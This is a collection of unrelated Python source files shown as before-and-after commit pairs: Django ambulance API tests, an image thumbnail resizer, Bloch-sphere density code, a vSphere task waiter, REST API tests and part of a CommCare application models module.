# self.assertEqual(response.status_code, 400)
#
# # set wrong ambulance id
# response = client.patch('/en/api/ambulance/100/',
# data=json.dumps({
# 'status': status
# }),
# follow=True)
# self.assertEqual(response.status_code, 404)
#
# # logout
# client.logout()
#
# # login as testuser2
# client.login(username='testuser2', password='very_secret')
#
# # retrieve ambulance
# response = client.get('/en/api/ambulance/{}/'.format(str(self.a3.id)),
# follow=True)
# self.assertEqual(response.status_code, 200)
# result = JSONParser().parse(BytesIO(response.content))
# answer = AmbulanceSerializer(self.a3).data
# self.assertDictEqual(result, answer)
#
# # set status ambulance
# status = AmbulanceStatus.OS.name
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a3.id)),
# content_type='application/json',
# data=json.dumps({
# 'status': status,
# }),
# follow=True)
# self.assertEqual(response.status_code, 200)
# result = JSONParser().parse(BytesIO(response.content))
# answer = AmbulanceSerializer(Ambulance.objects.get(id=self.a3.id)).data
# self.assertDictEqual(result, answer)
#
# # retrieve new ambulance status
# response = client.get('/en/api/ambulance/{}/'.format(str(self.a3.id)),
# follow=True)
# self.assertEqual(response.status_code, 200)
# result = JSONParser().parse(BytesIO(response.content))
# self.assertEqual(result['status'], status)
#
# # set location
# timestamp = timezone.now()
# location = {'latitude': -2., 'longitude': 7.}
#
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a3.id)),
# content_type='application/json',
# data=json.dumps({
# 'location': point2str(location),
# 'timestamp': date2iso(timestamp),
# }),
# follow=True)
# self.assertEqual(response.status_code, 200)
# result = JSONParser().parse(BytesIO(response.content))
# answer = AmbulanceSerializer(Ambulance.objects.get(id=self.a3.id)).data
# if math.fabs(answer['orientation'] - result['orientation']) < 1e-4:
# answer['orientation'] = result['orientation']
# self.assertDictEqual(result, answer)
#
# # retrieve new ambulance location
# response = client.get('/en/api/ambulance/{}/'.format(str(self.a3.id)),
# follow=True)
# self.assertEqual(response.status_code, 200)
# result = JSONParser().parse(BytesIO(response.content))
# self.assertEqual(result['status'], status)
# self.assertEqual(result['location'], point2str(location))
# self.assertEqual(result['timestamp'], date2iso(timestamp))
#
# # set status ambulance
# status = AmbulanceStatus.OS.name
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a1.id)),
# content_type='application/json',
# data=json.dumps({
# 'status': status,
# }),
# follow=True)
# self.assertEqual(response.status_code, 404)
#
# # set status ambulance
# status = AmbulanceStatus.OS.name
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a2.id)),
# content_type='application/json',
# data=json.dumps({
# 'status': status,
# }),
# follow=True)
# self.assertEqual(response.status_code, 404)
#
# # logout
# client.logout()
#
# # login as testuser1
# client.login(username='testuser1', password='top_secret')
#
# # set status ambulance
# status = AmbulanceStatus.OS.name
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a1.id)),
# content_type='application/json',
# data=json.dumps({
# 'status': status,
# }),
# follow=True)
# self.assertEqual(response.status_code, 404)
#
# # set status ambulance
# status = AmbulanceStatus.OS.name
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a2.id)),
# content_type='application/json',
# data=json.dumps({
# 'status': status,
# }),
# follow=True)
# self.assertEqual(response.status_code, 404)
#
# # set status ambulance
# status = AmbulanceStatus.OS.name
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a3.id)),
# content_type='application/json',
# data=json.dumps({
# 'status': status,
# }),
# follow=True)
# self.assertEqual(response.status_code, 404)
#
# # logout
# client.logout()
|
from cStringIO import StringIO
from PIL import Image
from django.conf import settings
from django.core.files.storage import get_storage_class
import os
import requests
from utils.viewer_tools import get_path
def flat( *nums ):
'''Build a tuple of ints from float or integer arguments.
Useful because PIL crop and resize require integer points.
source: https://gist.github.com/16a01455
'''
return tuple( int(round(n)) for n in nums )
def get_dimensions((width, height), longest_side):
if width > height:
width = longest_side
height = (height / width) * longest_side
elif height > width:
height = longest_side
width = (width / height) * longest_side
else:
height = longest_side
width = longest_side
return flat(width, height)
def _save_thumbnails(image, path, size, suffix, filename=None):
# If filename is present, resize on s3 fs
if filename:
default_storage = get_storage_class()()
fs = get_storage_class('django.core.files.storage.FileSystemStorage')()
# Ensure conversion to float in operations
image.thumbnail(get_dimensions(image.size, float(size)),
Image.ANTIALIAS)
image.save(get_path(path, suffix))
default_storage.save(get_path(filename, suffix),
fs.open(get_path(path, suffix)))
else:
image.thumbnail(get_dimensions(image.size, size), Image.ANTIALIAS)
image.save(get_path(path, suffix))
def resize(filename):
default_storage = get_storage_class()()
path = default_storage.url(filename)
req = requests.get(path)
if req.status_code == 200:
im = StringIO(req.content)
image = Image.open(im)
conf = settings.THUMB_CONF
fs = get_storage_class('django.core.files.storage.FileSystemStorage')()
if not os.path.exists(os.path.abspath(settings.MEDIA_ROOT)):
os.makedirs(os.path.abspath(settings.MEDIA_ROOT))
loc_path = fs.path('dummy.%s' % settings.IMG_FILE_TYPE)
[_save_thumbnails(
image, loc_path, conf[key]['size'], conf[key]['suffix'],
filename=filename) for key in settings.THUMB_ORDER]
def resize_local_env(filename):
default_storage = get_storage_class()()
path = default_storage.path(filename)
image = Image.open(path)
conf = settings.THUMB_CONF
[_save_thumbnails(
image, path, conf[key]['size'],
conf[key]['suffix']) for key in settings.THUMB_ORDER]
def image_url(attachment, suffix):
'''Return url of an image given size(@param suffix)
e.g large, medium, small, or generate required thumbnail
'''
url = attachment.media_file.url
if suffix == 'original':
return url
else:
default_storage = get_storage_class()()
fs = get_storage_class('django.core.files.storage.FileSystemStorage')()
if settings.THUMB_CONF.has_key(suffix):
size = settings.THUMB_CONF[suffix]['suffix']
filename = attachment.media_file.name
if default_storage.exists(filename):
if default_storage.exists(get_path(filename, size)) and\
default_storage.size(get_path(filename, size)) > 0:
url = default_storage.url(
get_path(filename, size))
else:
if default_storage.__class__ != fs.__class__:
resize(filename)
else:
resize_local_env(filename)
return image_url(attachment, suffix)
else:
return None
return url
handle ZeroDivisionError exceptions, occurs when the height and thumbnail height are the same
from cStringIO import StringIO
from PIL import Image
from django.conf import settings
from django.core.files.storage import get_storage_class
import os
import requests
from utils.viewer_tools import get_path
def flat( *nums ):
'''Build a tuple of ints from float or integer arguments.
Useful because PIL crop and resize require integer points.
source: https://gist.github.com/16a01455
'''
return tuple( int(round(n)) for n in nums )
def get_dimensions((width, height), longest_side):
if width > height:
width = longest_side
height = (height / width) * longest_side
elif height > width:
height = longest_side
width = (width / height) * longest_side
else:
height = longest_side
width = longest_side
return flat(width, height)
def _save_thumbnails(image, path, size, suffix, filename=None):
# If filename is present, resize on s3 fs
if filename:
default_storage = get_storage_class()()
fs = get_storage_class('django.core.files.storage.FileSystemStorage')()
# Ensure conversion to float in operations
image.thumbnail(get_dimensions(image.size, float(size)),
Image.ANTIALIAS)
image.save(get_path(path, suffix))
default_storage.save(get_path(filename, suffix),
fs.open(get_path(path, suffix)))
else:
try:
image.thumbnail(get_dimensions(image.size, size), Image.ANTIALIAS)
except ZeroDivisionError:
pass
image.save(get_path(path, suffix))
def resize(filename):
default_storage = get_storage_class()()
path = default_storage.url(filename)
req = requests.get(path)
if req.status_code == 200:
im = StringIO(req.content)
image = Image.open(im)
conf = settings.THUMB_CONF
fs = get_storage_class('django.core.files.storage.FileSystemStorage')()
if not os.path.exists(os.path.abspath(settings.MEDIA_ROOT)):
os.makedirs(os.path.abspath(settings.MEDIA_ROOT))
loc_path = fs.path('dummy.%s' % settings.IMG_FILE_TYPE)
[_save_thumbnails(
image, loc_path, conf[key]['size'], conf[key]['suffix'],
filename=filename) for key in settings.THUMB_ORDER]
def resize_local_env(filename):
default_storage = get_storage_class()()
path = default_storage.path(filename)
image = Image.open(path)
conf = settings.THUMB_CONF
[_save_thumbnails(
image, path, conf[key]['size'],
conf[key]['suffix']) for key in settings.THUMB_ORDER]
def image_url(attachment, suffix):
'''Return url of an image given size(@param suffix)
e.g large, medium, small, or generate required thumbnail
'''
url = attachment.media_file.url
if suffix == 'original':
return url
else:
default_storage = get_storage_class()()
fs = get_storage_class('django.core.files.storage.FileSystemStorage')()
if settings.THUMB_CONF.has_key(suffix):
size = settings.THUMB_CONF[suffix]['suffix']
filename = attachment.media_file.name
if default_storage.exists(filename):
if default_storage.exists(get_path(filename, size)) and\
default_storage.size(get_path(filename, size)) > 0:
url = default_storage.url(
get_path(filename, size))
else:
if default_storage.__class__ != fs.__class__:
resize(filename)
else:
resize_local_env(filename)
return image_url(attachment, suffix)
else:
return None
return url
|
#!/usr/bin/python3
from scipy.optimize import root
import numpy as np
from numpy import cosh, arccosh, sinh, arctan2, cos, sin, exp, pi
import matplotlib.pyplot as plt
from matplotlib import cm, colors
from mpl_toolkits.mplot3d import Axes3D
atan2 = arctan2
def map_qpm_to_sphere(qs, epsilon):
"""Takes values for qp and qm and maps them to the surface of the bloch
sphere.
"""
cos_theta = 2/(cosh(2*epsilon*qs[0]) + cosh(2*epsilon*qs[1]))
phi = atan2(sinh(epsilon*(qs[0] - qs[1])),
(sinh(2*epsilon*qs[0]) + sinh(2*epsilon*qs[1]))/2)
return np.array([cos_theta, phi])
def map_q12_to_sphere(qs, epsilon):
"""Takes values for q1 and q2 and maps them to the surface of the bloch
sphere.
"""
cos_theta = 2/(cosh(epsilon*(qs[0] + qs[1])) +
cosh(epsilon*(qs[0] - qs[1])))
phi = atan2(sinh(epsilon*qs[1]),
(sinh(epsilon*(qs[0] + qs[1])) +
sinh(epsilon*(qs[0] - qs[1])))/2)
return np.array([cos_theta, phi])
# angles = np.array([cos(Theta), Phi])
def guess_qpm_vals(angles, epsilon):
"""Generates an initial guess of qp and qm for the rootfinder.
"""
return np.where(angles[0] == 1, np.zeros(angles.shape),
np.array([
cos(pi/4 - angles[1])*arccosh(2/angles[0] - 1)/(2*epsilon),
sin(pi/4 - angles[1])*arccosh(2/angles[0] - 1)/(2*epsilon)
]))
# angles = np.array([cos(Theta), Phi])
def array_get_qpm_vals(angles, epsilon):
"""Takes points on the upper hemisphere of the bloch sphere and maps them to
points on the qp qm plane.
"""
costheta = np.array(angles[0])
phi = np.array(angles[1])
# Put phi in the range [-pi/2, 3pi/2).
phi = (phi + pi/2)%(2*pi) - pi/2
# If phi in range [pi/2, 3pi/2), solve for qs using phi - pi and negate the
# q values obtained.
sign = np.where(phi > pi/2, -1, 1)
phi = np.where(phi > pi/2, phi - pi, phi)
# Currently solving for values individually, but when passed an array of
# of angle values it won't converge (I think the rootfinder thinks it has
# to solve for all the roots simultaneously as a large system of
# equations).
inverted = np.zeros(np.array(angles).shape)
for m in range(angles.shape[1]):
for n in range(angles.shape[2]):
if costheta[m,n] == 1:
inverted[:,m,n] = np.array([0, 0])
else:
try:
sol = root(lambda qs: map_qpm_to_sphere(qs, epsilon) -
np.array([costheta[m,n], phi[m,n]]),
guess_qpm_vals(np.array([costheta[m,n],
phi[m,n]]), epsilon))
inverted[:,m,n] = sign[m,n]*sol.x
except Exception as e:
print('cos(theta) = ' + str(costheta[m,n]) +
', phi = ' + str(phi[m,n]) + ', sign = ' +
str(sign[m,n]) + '\n' + str(e))
return inverted
def G_qpm(qp, qm, epsilon):
"""The probability density function on the qp qm plane. (might be improperly
normalized)
"""
return (epsilon/(4*pi)*exp(-epsilon*(qp**2 + qm**2 + 1))*
(cosh(2*epsilon*qp) + cosh(2*epsilon*qm)))
def G_q12(q1, q2, epsilon):
"""The probability density function on the q1 q2 plane. (might be improperly
normalized)
"""
return (epsilon/(4*pi)*exp(-epsilon*(q1**2 + q2**2 + 2)/2)*(cosh(epsilon*(q1
+ q2)) + cosh(epsilon*(q1 - q2))))
def G_angles(angles, epsilon):
"""The probability density function on the upper hemisphere of the bloch
sphere.
"""
qp, qm = array_get_qpm_vals(angles, epsilon)
s_pp = sinh(2*epsilon*qp)
s_pm = sinh(epsilon*(qp + qm))
s_mp = sinh(epsilon*(qp - qm))
s_mm = sinh(2*epsilon*qm)
c_pp = cosh(2*epsilon*qp)
c_mp = cosh(epsilon*(qp - qm))
c_mm = cosh(2*epsilon*qm)
parallelogram_area = (np.abs((s_pp + s_mm)**2*c_mp +
2*(s_pp - s_mm)*s_mp*c_pp) /
((c_pp + c_mm)**2*(4*s_pm**2 + s_mp**2 +
s_pp**2 + s_mm**2)))
return G_qpm(qp, qm, epsilon)/parallelogram_area
Added "from __future__" import to support python2
#!/usr/bin/python3
from __future__ import division
from scipy.optimize import root
import numpy as np
from numpy import cosh, arccosh, sinh, arctan2, cos, sin, exp, pi
import matplotlib.pyplot as plt
from matplotlib import cm, colors
from mpl_toolkits.mplot3d import Axes3D
atan2 = arctan2
def map_qpm_to_sphere(qs, epsilon):
"""Takes values for qp and qm and maps them to the surface of the bloch
sphere.
"""
cos_theta = 2/(cosh(2*epsilon*qs[0]) + cosh(2*epsilon*qs[1]))
phi = atan2(sinh(epsilon*(qs[0] - qs[1])),
(sinh(2*epsilon*qs[0]) + sinh(2*epsilon*qs[1]))/2)
return np.array([cos_theta, phi])
def map_q12_to_sphere(qs, epsilon):
"""Takes values for q1 and q2 and maps them to the surface of the bloch
sphere.
"""
cos_theta = 2/(cosh(epsilon*(qs[0] + qs[1])) +
cosh(epsilon*(qs[0] - qs[1])))
phi = atan2(sinh(epsilon*qs[1]),
(sinh(epsilon*(qs[0] + qs[1])) +
sinh(epsilon*(qs[0] - qs[1])))/2)
return np.array([cos_theta, phi])
# angles = np.array([cos(Theta), Phi])
def guess_qpm_vals(angles, epsilon):
"""Generates an initial guess of qp and qm for the rootfinder.
"""
return np.where(angles[0] == 1, np.zeros(angles.shape),
np.array([
cos(pi/4 - angles[1])*arccosh(2/angles[0] - 1)/(2*epsilon),
sin(pi/4 - angles[1])*arccosh(2/angles[0] - 1)/(2*epsilon)
]))
# angles = np.array([cos(Theta), Phi])
def array_get_qpm_vals(angles, epsilon):
"""Takes points on the upper hemisphere of the bloch sphere and maps them to
points on the qp qm plane.
"""
costheta = np.array(angles[0])
phi = np.array(angles[1])
# Put phi in the range [-pi/2, 3pi/2).
phi = (phi + pi/2)%(2*pi) - pi/2
# If phi in range [pi/2, 3pi/2), solve for qs using phi - pi and negate the
# q values obtained.
sign = np.where(phi > pi/2, -1, 1)
phi = np.where(phi > pi/2, phi - pi, phi)
# Currently solving for values individually, but when passed an array of
# of angle values it won't converge (I think the rootfinder thinks it has
# to solve for all the roots simultaneously as a large system of
# equations).
inverted = np.zeros(np.array(angles).shape)
for m in range(angles.shape[1]):
for n in range(angles.shape[2]):
if costheta[m,n] == 1:
inverted[:,m,n] = np.array([0, 0])
else:
try:
sol = root(lambda qs: map_qpm_to_sphere(qs, epsilon) -
np.array([costheta[m,n], phi[m,n]]),
guess_qpm_vals(np.array([costheta[m,n],
phi[m,n]]), epsilon))
inverted[:,m,n] = sign[m,n]*sol.x
except Exception as e:
print('cos(theta) = ' + str(costheta[m,n]) +
', phi = ' + str(phi[m,n]) + ', sign = ' +
str(sign[m,n]) + '\n' + str(e))
return inverted
def G_qpm(qp, qm, epsilon):
"""The probability density function on the qp qm plane. (might be improperly
normalized)
"""
return (epsilon/(4*pi)*exp(-epsilon*(qp**2 + qm**2 + 1))*
(cosh(2*epsilon*qp) + cosh(2*epsilon*qm)))
def G_q12(q1, q2, epsilon):
"""The probability density function on the q1 q2 plane. (might be improperly
normalized)
"""
return (epsilon/(4*pi)*exp(-epsilon*(q1**2 + q2**2 + 2)/2)*(cosh(epsilon*(q1
+ q2)) + cosh(epsilon*(q1 - q2))))
def G_angles(angles, epsilon):
"""The probability density function on the upper hemisphere of the bloch
sphere.
"""
qp, qm = array_get_qpm_vals(angles, epsilon)
s_pp = sinh(2*epsilon*qp)
s_pm = sinh(epsilon*(qp + qm))
s_mp = sinh(epsilon*(qp - qm))
s_mm = sinh(2*epsilon*qm)
c_pp = cosh(2*epsilon*qp)
c_mp = cosh(epsilon*(qp - qm))
c_mm = cosh(2*epsilon*qm)
parallelogram_area = (np.abs((s_pp + s_mm)**2*c_mp +
2*(s_pp - s_mm)*s_mp*c_pp) /
((c_pp + c_mm)**2*(4*s_pm**2 + s_mp**2 +
s_pp**2 + s_mm**2)))
return G_qpm(qp, qm, epsilon)/parallelogram_area
|
import time
from pyVmomi import vim
class SynchronousTaskWaiter(object):
def __init__(self):
pass
# noinspection PyMethodMayBeStatic
def wait_for_task(self, task, logger, action_name='job', hide_result=False):
"""
Waits and provides updates on a vSphere task
:param task:
:param action_name:
:param hide_result:
:param logger:
"""
while task.info.state == vim.TaskInfo.State.running or task.info.state == vim.TaskInfo.State.queued:
time.sleep(2)
if task.info.state == vim.TaskInfo.State.success:
if task.info.result is not None and not hide_result:
out = '%s completed successfully, result: %s' % (action_name, task.info.result)
logger.info(out)
else:
out = '%s completed successfully.' % action_name
logger.info(out)
else: # error state
multi_msg = ''
if task.info.error.faultMessage:
multi_msg = ', '.join([err.message for err in task.info.error.faultMessage])
logger.info(multi_msg)
raise Exception(multi_msg)
return task.info.result
refactored task_waiter to be more pythonic
import time
from pyVmomi import vim
class SynchronousTaskWaiter(object):
def __init__(self):
pass
# noinspection PyMethodMayBeStatic
def wait_for_task(self, task, logger, action_name='job', hide_result=False):
"""
Waits and provides updates on a vSphere task
:param task:
:param action_name:
:param hide_result:
:param logger:
"""
while task.info.state in [vim.TaskInfo.State.running, vim.TaskInfo.State.queued]:
time.sleep(2)
if task.info.state == vim.TaskInfo.State.success:
if task.info.result is not None and not hide_result:
out = '%s completed successfully, result: %s' % (action_name, task.info.result)
logger.info(out)
else:
out = '%s completed successfully.' % action_name
logger.info(out)
else: # error state
multi_msg = ''
if task.info.error.faultMessage:
multi_msg = ', '.join([err.message for err in task.info.error.faultMessage])
logger.info(multi_msg)
raise Exception(multi_msg)
return task.info.result
|
from rest_framework.test import APIRequestFactory
from rest_framework.test import APIClient
import urllib2
import unittest
BASEURL = "http://127.0.0.1:8000/api"
factory = APIRequestFactory()
client = APIClient()
class TestYourWebserver(unittest.TestCase):
def setUp(self,baseurl=BASEURL):
"""do nothing"""
self.baseurl = baseurl
def test_user_post_list(self):
url = self.baseurl + "/author/posts"
req = urllib2.urlopen(url, None, 3)
self.assertTrue( req.getcode() == 200 , "200 OK Not FOUND!")
self.assertTrue( req.info().gettype() == "text/css", ("Bad mimetype for css! %s" % req.info().gettype()))
def test_post_list(self):
url = self.baseurl + "/posts"
req = urllib2.urlopen(url, None, 3)
self.assertTrue( req.getcode() == 200 , "200 OK Not FOUND!")
def test_author_post_list(self):
url = self.baseurl + "/author/" + authorID + "posts"
req = urllib2.urlopen(url, None, 3)
self.assertTrue( req.getcode() == 200 , "200 OK Not FOUND!")
def test_post_detail(self):
url = self.baseurl + "/post/" + postID
req = urllib2.urlopen(url, None, 3)
self.assertTrue( req.getcode() == 200 , "200 OK Not FOUND!")
def test_user_list(self):
#TODO
def test_user_detail(self):
#TODO
if __name__ == '__main__':
unittest.main()
resume tests
from rest_framework.test import APIRequestFactory
from rest_framework.test import APIClient
from django.test import TestCase
from .models import *
from django.contrib.auth.models import User
import urllib2
import unittest
BASEURL = "http://127.0.0.1:8000/api"
factory = APIRequestFactory()
client = APIClient()
class DBTests(TestCase):
def setUp(self):
user = User.objects.create()
author = Author.objects.create(user=user, displayName="stephen")
post = Post.objects.create(author=author, title="cool post", content="cool content")
def test
class TestYourWebserver(unittest.TestCase):
def setUp(self,baseurl=BASEURL):
"""do nothing"""
self.baseurl = baseurl
def test_user_post_list(self):
url = self.baseurl + "/author/posts"
req = urllib2.urlopen(url, None, 3)
self.assertTrue( req.getcode() == 200 , "200 OK Not FOUND!")
self.assertTrue( req.info().gettype() == "text/css", ("Bad mimetype for css! %s" % req.info().gettype()))
def test_post_list(self):
url = self.baseurl + "/posts"
req = urllib2.urlopen(url, None, 3)
self.assertTrue( req.getcode() == 200 , "200 OK Not FOUND!")
def test_author_post_list(self):
url = self.baseurl + "/author/" + authorID + "posts"
req = urllib2.urlopen(url, None, 3)
self.assertTrue( req.getcode() == 200 , "200 OK Not FOUND!")
def test_post_detail(self):
url = self.baseurl + "/post/" + postID
req = urllib2.urlopen(url, None, 3)
self.assertTrue( req.getcode() == 200 , "200 OK Not FOUND!")
def test_user_list(self):
#TODO
def test_user_detail(self):
#TODO
if __name__ == '__main__':
unittest.main()
|
# coding=utf-8
"""
Application terminology
For any given application, there are a number of different documents.
The primary application document is an instance of Application. This
document id is what you'll see in the URL on most app manager pages. Primary
application documents should have `copy_of == None` and `is_released ==
False`. When an application is saved, the field `version` is incremented.
When a user makes a build of an application, a copy of the primary
application document is made. These documents are the "versions" you see on
the deploy page. Each build document will have a different id, and the
`copy_of` field will be set to the ID of the primary application document.
Additionally, some attachments such as `profile.xml` and `suite.xml` will be
created and saved to the build doc (see `create_all_files`).
When a build is starred, this is called "releasing" the build. The parameter
`is_released` will be set to True on the build document.
You might also run in to remote applications and applications copied to be
published on the exchange, but those are quite infrequent.
"""
import calendar
from distutils.version import LooseVersion
from itertools import chain
import tempfile
import os
import logging
import hashlib
import random
import json
import types
import re
import datetime
import uuid
from collections import defaultdict, namedtuple
from functools import wraps
from copy import deepcopy
from mimetypes import guess_type
from urllib2 import urlopen
from urlparse import urljoin
from couchdbkit import MultipleResultsFound
import itertools
from lxml import etree
from django.core.cache import cache
from django.utils.translation import override, ugettext as _, ugettext
from couchdbkit.exceptions import BadValueError
from corehq.apps.app_manager.suite_xml.utils import get_select_chain
from corehq.apps.app_manager.suite_xml.generator import SuiteGenerator, MediaSuiteGenerator
from corehq.apps.app_manager.xpath_validator import validate_xpath
from corehq.apps.userreports.exceptions import ReportConfigurationNotFoundError
from dimagi.ext.couchdbkit import *
from django.conf import settings
from django.contrib.auth.hashers import make_password
from django.core.urlresolvers import reverse
from django.template.loader import render_to_string
from restkit.errors import ResourceError
from couchdbkit.resource import ResourceNotFound
from corehq import toggles, privileges
from corehq.blobs.mixin import BlobMixin
from corehq.const import USER_DATE_FORMAT, USER_TIME_FORMAT
from corehq.apps.app_manager.feature_support import CommCareFeatureSupportMixin
from corehq.util.quickcache import quickcache
from corehq.util.timezones.conversions import ServerTime
from dimagi.utils.couch import CriticalSection
from django_prbac.exceptions import PermissionDenied
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.app_manager.commcare_settings import check_condition
from corehq.apps.app_manager.const import *
from corehq.apps.app_manager.xpath import (
dot_interpolate,
interpolate_xpath,
LocationXpath,
)
from corehq.apps.builds import get_default_build_spec
from dimagi.utils.couch.cache import cache_core
from dimagi.utils.couch.undo import DeleteRecord, DELETED_SUFFIX
from dimagi.utils.dates import DateSpan
from dimagi.utils.decorators.memoized import memoized
from dimagi.utils.make_uuid import random_hex
from dimagi.utils.web import get_url_base, parse_int
import commcare_translations
from corehq.util import bitly
from corehq.util import view_utils
from corehq.apps.appstore.models import SnapshotMixin
from corehq.apps.builds.models import BuildSpec, BuildRecord
from corehq.apps.hqmedia.models import HQMediaMixin
from corehq.apps.translations.models import TranslationMixin
from corehq.apps.users.models import CouchUser
from corehq.apps.users.util import cc_user_domain
from corehq.apps.domain.models import cached_property, Domain
from corehq.apps.app_manager import current_builds, app_strings, remote_app, \
id_strings, commcare_settings
from corehq.apps.app_manager.suite_xml import xml_models as suite_models
from corehq.apps.app_manager.dbaccessors import (
get_app,
get_latest_build_doc,
get_latest_released_app_doc,
domain_has_apps,
)
from corehq.apps.app_manager.util import (
split_path,
save_xform,
ParentCasePropertyBuilder,
is_usercase_in_use,
actions_use_usercase,
update_unique_ids,
app_callout_templates,
xpath_references_case,
xpath_references_user_case,
)
from corehq.apps.app_manager.xform import XForm, parse_xml as _parse_xml, \
validate_xform
from corehq.apps.app_manager.templatetags.xforms_extras import trans
from .exceptions import (
AppEditingError,
BlankXFormError,
ConflictingCaseTypeError,
FormNotFoundException,
IncompatibleFormTypeException,
LocationXpathValidationError,
ModuleNotFoundException,
ModuleIdMissingException,
RearrangeError,
SuiteValidationError,
VersioningError,
XFormException,
XFormIdNotUnique,
XFormValidationError,
ScheduleError,
CaseXPathValidationError,
UserCaseXPathValidationError,
)
from corehq.apps.reports.daterange import get_daterange_start_end_dates
from jsonpath_rw import jsonpath, parse
WORKFLOW_DEFAULT = 'default' # go to the app main screen
WORKFLOW_ROOT = 'root' # go to the module select screen
WORKFLOW_PARENT_MODULE = 'parent_module' # go to the parent module's screen
WORKFLOW_MODULE = 'module' # go to the current module's screen
WORKFLOW_PREVIOUS = 'previous_screen' # go to the previous screen (prior to entering the form)
WORKFLOW_FORM = 'form' # go straight to another form
ALL_WORKFLOWS = [
WORKFLOW_DEFAULT,
WORKFLOW_ROOT,
WORKFLOW_PARENT_MODULE,
WORKFLOW_MODULE,
WORKFLOW_PREVIOUS,
WORKFLOW_FORM,
]
DETAIL_TYPES = ['case_short', 'case_long', 'ref_short', 'ref_long']
FIELD_SEPARATOR = ':'
ATTACHMENT_REGEX = r'[^/]*\.xml'
ANDROID_LOGO_PROPERTY_MAPPING = {
'hq_logo_android_home': 'brand-banner-home',
'hq_logo_android_login': 'brand-banner-login',
}
def jsonpath_update(datum_context, value):
field = datum_context.path.fields[0]
parent = jsonpath.Parent().find(datum_context)[0]
parent.value[field] = value
# store a list of references to form ID's so that
# when an app is copied we can update the references
# with the new values
form_id_references = []
def FormIdProperty(expression, **kwargs):
"""
Create a StringProperty that references a form ID. This is necessary because
form IDs change when apps are copied so we need to make sure we update
any references to the them.
:param expression: jsonpath expression that can be used to find the field
:param kwargs: arguments to be passed to the underlying StringProperty
"""
path_expression = parse(expression)
assert isinstance(path_expression, jsonpath.Child), "only child path expressions are supported"
field = path_expression.right
assert len(field.fields) == 1, 'path expression can only reference a single field'
form_id_references.append(path_expression)
return StringProperty(**kwargs)
def _rename_key(dct, old, new):
if old in dct:
if new in dct and dct[new]:
dct["%s_backup_%s" % (new, hex(random.getrandbits(32))[2:-1])] = dct[new]
dct[new] = dct[old]
del dct[old]
@memoized
def load_app_template(slug):
path = os.path.join(os.path.dirname(__file__), 'static', 'app_manager', 'json', 'template_apps')
with open(os.path.join(path, slug + '.json')) as f:
return json.load(f)
@memoized
def load_case_reserved_words():
with open(os.path.join(os.path.dirname(__file__), 'static', 'app_manager', 'json', 'case-reserved-words.json')) as f:
return json.load(f)
@memoized
def load_form_template(filename):
with open(os.path.join(os.path.dirname(__file__), 'data', filename)) as f:
return f.read()
class IndexedSchema(DocumentSchema):
"""
Abstract class.
Meant for documents that appear in a list within another document
and need to know their own position within that list.
"""
def with_id(self, i, parent):
self._i = i
self._parent = parent
return self
@property
def id(self):
return self._i
def __eq__(self, other):
return other and (self.id == other.id) and (self._parent == other._parent)
class Getter(object):
def __init__(self, attr):
self.attr = attr
def __call__(self, instance):
items = getattr(instance, self.attr)
l = len(items)
for i, item in enumerate(items):
yield item.with_id(i % l, instance)
def __get__(self, instance, owner):
# thanks, http://metapython.blogspot.com/2010/11/python-instance-methods-how-are-they.html
# this makes Getter('foo') act like a bound method
return types.MethodType(self, instance, owner)
class FormActionCondition(DocumentSchema):
"""
The condition under which to open/update/close a case/referral
Either {'type': 'if', 'question': '/xpath/to/node', 'answer': 'value'}
in which case the action takes place if question has answer answer,
or {'type': 'always'} in which case the action always takes place.
"""
type = StringProperty(choices=["if", "always", "never"], default="never")
question = StringProperty()
answer = StringProperty()
operator = StringProperty(choices=['=', 'selected'], default='=')
def is_active(self):
return self.type in ('if', 'always')
class FormAction(DocumentSchema):
"""
Corresponds to Case XML
"""
condition = SchemaProperty(FormActionCondition)
def is_active(self):
return self.condition.is_active()
@classmethod
def get_action_paths(cls, action):
if action.condition.type == 'if':
yield action.condition.question
for __, path in cls.get_action_properties(action):
yield path
@classmethod
def get_action_properties(self, action):
action_properties = action.properties()
if 'name_path' in action_properties and action.name_path:
yield 'name', action.name_path
if 'case_name' in action_properties:
yield 'name', action.case_name
if 'external_id' in action_properties and action.external_id:
yield 'external_id', action.external_id
if 'update' in action_properties:
for name, path in action.update.items():
yield name, path
if 'case_properties' in action_properties:
for name, path in action.case_properties.items():
yield name, path
if 'preload' in action_properties:
for path, name in action.preload.items():
yield name, path
class UpdateCaseAction(FormAction):
update = DictProperty()
class PreloadAction(FormAction):
preload = DictProperty()
def is_active(self):
return bool(self.preload)
class UpdateReferralAction(FormAction):
followup_date = StringProperty()
def get_followup_date(self):
if self.followup_date:
return "if(date({followup_date}) >= date(today()), {followup_date}, date(today() + 2))".format(
followup_date=self.followup_date,
)
return self.followup_date or "date(today() + 2)"
class OpenReferralAction(UpdateReferralAction):
name_path = StringProperty()
class OpenCaseAction(FormAction):
name_path = StringProperty()
external_id = StringProperty()
class OpenSubCaseAction(FormAction):
case_type = StringProperty()
case_name = StringProperty()
reference_id = StringProperty()
case_properties = DictProperty()
repeat_context = StringProperty()
# relationship = "child" for index to a parent case (default)
# relationship = "extension" for index to a host case
relationship = StringProperty(choices=['child', 'extension'], default='child')
close_condition = SchemaProperty(FormActionCondition)
class FormActions(DocumentSchema):
open_case = SchemaProperty(OpenCaseAction)
update_case = SchemaProperty(UpdateCaseAction)
close_case = SchemaProperty(FormAction)
open_referral = SchemaProperty(OpenReferralAction)
update_referral = SchemaProperty(UpdateReferralAction)
close_referral = SchemaProperty(FormAction)
case_preload = SchemaProperty(PreloadAction)
referral_preload = SchemaProperty(PreloadAction)
load_from_form = SchemaProperty(PreloadAction)
usercase_update = SchemaProperty(UpdateCaseAction)
usercase_preload = SchemaProperty(PreloadAction)
subcases = SchemaListProperty(OpenSubCaseAction)
def all_property_names(self):
names = set()
names.update(self.update_case.update.keys())
names.update(self.case_preload.preload.values())
for subcase in self.subcases:
names.update(subcase.case_properties.keys())
return names
class CaseIndex(DocumentSchema):
tag = StringProperty()
reference_id = StringProperty(default='parent')
relationship = StringProperty(choices=['child', 'extension'], default='child')
class AdvancedAction(IndexedSchema):
case_type = StringProperty()
case_tag = StringProperty()
